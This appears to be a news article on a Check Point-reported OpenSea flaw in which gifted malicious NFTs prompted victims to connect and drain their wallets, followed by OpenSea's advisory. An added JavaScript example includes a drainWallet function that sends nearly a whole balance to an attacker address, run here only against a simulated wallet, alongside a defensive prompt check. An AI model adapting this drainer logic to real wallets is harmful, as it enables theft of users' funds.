A critical security vulnerability on OpenSea's platform allowed hackers to hijack user accounts and steal entire crypto wallets by sending malicious NFTs.
Over the past few weeks, several cases of emptied crypto wallets have been reported on social media. Users complained that their wallets showed a zero balance after they accepted a gifted NFT on the OpenSea marketplace.
Prompted by these reports, Check Point researchers investigated the OpenSea platform. The investigation revealed a critical security vulnerability which, if exploited, allowed hackers to hijack user accounts and steal crypto wallets by luring victims with free, malicious non-fungible tokens (NFTs).
OpenSea is a peer-to-peer digital marketplace for crypto collectibles and NFTs, a platform for buying and selling exclusive digital assets. OpenSea recorded $3.4 billion in transaction volume in August 2021 and has grown into one of the largest NFT marketplaces in the crypto world.
The vulnerability allowed an attacker to create a malicious NFT and send it to the target as a gift.
When the victim views the malicious NFT, its content is served from OpenSea's storage domain and triggers a pop-up asking to connect the victim's cryptocurrency wallet. Seeing nothing unusual, the victim clicks to connect the wallet in order to claim the gift, which exposes the wallet to the attacker's code.
A second pop-up, also served from OpenSea's storage domain, then asks the victim to approve a transaction. If the victim clicks through it without reading the message, the attacker can drain the entire wallet. Victims fall for this easily because almost any action on the platform, even liking an artwork, requires a wallet sign-in; these prompts look like the routine system notices users are accustomed to clicking through on such platforms.
Check Point researchers reported their findings to OpenSea, and the two collaborated to address the issue. OpenSea deployed a fix, and says it has not identified any case in which the flaw was used against its customers.
OpenSea released an advisory to protect its users against the threat, stating the following:
- While signing wallet actions is required to take certain actions on OpenSea, you should always be careful when receiving requests to sign a transaction with your wallet online. Before you approve a request for your signature, you should carefully review what is being requested and consider whether the request is abnormal or suspicious. If you have any doubts, you should reject the request.
- Check if the signature request correlates with an expected action.
- Users should note that OpenSea does not request wallet signatures for viewing or clicking third-party photos or links. Such activity is highly suspicious, and users should not sign transactions that are unrelated to the specific actions on OpenSea.
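The two-prompt attack flow described above, and the "does this request match what I was doing?" check the advisory asks for, as an added example (not OpenSea's or Check Point's code). A constructed stand-in replaces the EIP-1193 provider a browser wallet injects as `window.ethereum`; the addresses, balance and gas figures are made up, and `drainWallet` is an assumed reconstruction of what a script embedded in a malicious NFT's media would do once both prompts are approved.

```javascript
// Added example, not OpenSea's or Check Point's code. Simulates the two wallet
// prompts the attack relies on with a constructed stand-in for the EIP-1193
// provider a browser wallet injects as window.ethereum, then applies the
// advisory's rule: reject any prompt that does not match the action you meant.
// Addresses, balances and gas figures are constructed.

const ATTACKER = "0x1111111111111111111111111111111111111111"; // constructed
const VICTIM   = "0x2222222222222222222222222222222222222222"; // constructed

// Stand-in wallet provider. Requests that a real wallet would show in a
// confirmation dialog are appended to `prompts` and answered by `approve`,
// which models whether the user clicks "Confirm" or "Reject".
function makeFakeProvider({ balanceWei, approve }) {
  const prompts = [];
  return {
    prompts,
    balance: () => balanceWei,
    async request({ method, params = [] }) {
      switch (method) {
        case "eth_requestAccounts": {           // prompt 1: connect wallet
          prompts.push({ method });
          if (!approve({ method })) throw new Error("user rejected");
          return [VICTIM];
        }
        case "eth_getBalance":                  // read-only, no dialog shown
          return "0x" + balanceWei.toString(16);
        case "eth_sendTransaction": {           // prompt 2: confirm transaction
          const tx = params[0];
          prompts.push({ method, tx });
          if (!approve({ method, tx })) throw new Error("user rejected");
          balanceWei -= BigInt(tx.value);       // funds leave the wallet
          return "0x" + "ab".repeat(32);        // fake transaction hash
        }
        default:
          throw new Error("unsupported method " + method);
      }
    },
  };
}

// Assumed attacker logic: connect, read the balance, and push a transfer of
// (almost) everything to the attacker. The victim sees only the two dialogs.
async function drainWallet(provider) {
  const [from] = await provider.request({ method: "eth_requestAccounts" });
  const balance = BigInt(
    await provider.request({ method: "eth_getBalance", params: [from, "latest"] })
  );
  const gasReserve = 21000n * 30000000000n;     // 21k gas at 30 gwei, assumed
  const value = balance - gasReserve;
  if (value <= 0n) return null;                 // nothing worth taking
  return provider.request({
    method: "eth_sendTransaction",
    params: [{ from, to: ATTACKER, value: "0x" + value.toString(16) }],
  });
}

// The advisory's rule as a predicate. Each user action legitimately needs a
// small set of wallet methods: viewing or clicking media needs none, so any
// prompt at all during "view" is abnormal, and a transfer is only expected
// when the user meant to pay, and only to the recipient they chose.
const EXPECTED_METHODS = {
  view: [],
  connect: ["eth_requestAccounts"],
  transfer: ["eth_requestAccounts", "eth_sendTransaction"],
};

function promptIsSuspicious(expected, prompt) {
  const allowed = EXPECTED_METHODS[expected.action] || [];
  if (!allowed.includes(prompt.method)) return true;
  if (prompt.method === "eth_sendTransaction" &&
      prompt.tx.to.toLowerCase() !== (expected.to || "").toLowerCase()) return true;
  return false;
}

// Run the attack against a user who clicks through every dialog (careful=false)
// and against one who rejects anything that fails the check (careful=true).
async function runScenario({ expected, careful }) {
  const provider = makeFakeProvider({
    balanceWei: 5n * 10n ** 18n,                // 5 ETH, constructed
    approve: (prompt) => !(careful && promptIsSuspicious(expected, prompt)),
  });
  let drained = false;
  try {
    drained = (await drainWallet(provider)) !== null;
  } catch (e) {
    if (e.message !== "user rejected") throw e;
  }
  return { drained, prompts: provider.prompts.length, remainingWei: provider.balance() };
}

// Usage: compare the careless viewer with the careful one.
if (typeof require !== "undefined" && require.main === module) {
  (async () => {
    for (const s of [{ expected: { action: "view" }, careful: false },
                     { expected: { action: "view" }, careful: true }]) {
      const r = await runScenario(s);
      console.log(s.careful ? "careful:" : "careless:", r.drained, r.prompts, r.remainingWei.toString());
    }
  })();
}
```

The careless viewer approves both prompts and is left with only the gas reserve; the careful viewer rejects the very first prompt, because viewing a gift should never require connecting a wallet, and a user who did intend a transfer still rejects the second prompt because the recipient is not the one they entered.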
The crypto market is largely an unregulated sector without stringent policies in place, which makes it an attractive target for cyberattacks. Although these marketplaces were created to extend the financial sector, many countries now view them as more of a bane than a boon.
China has issued a blanket ban on all crypto transactions and mining as part of its crackdown to root out illegal cryptocurrency activity in the country, and other countries are taking preventive measures to curb the security challenges arising from the DeFi markets.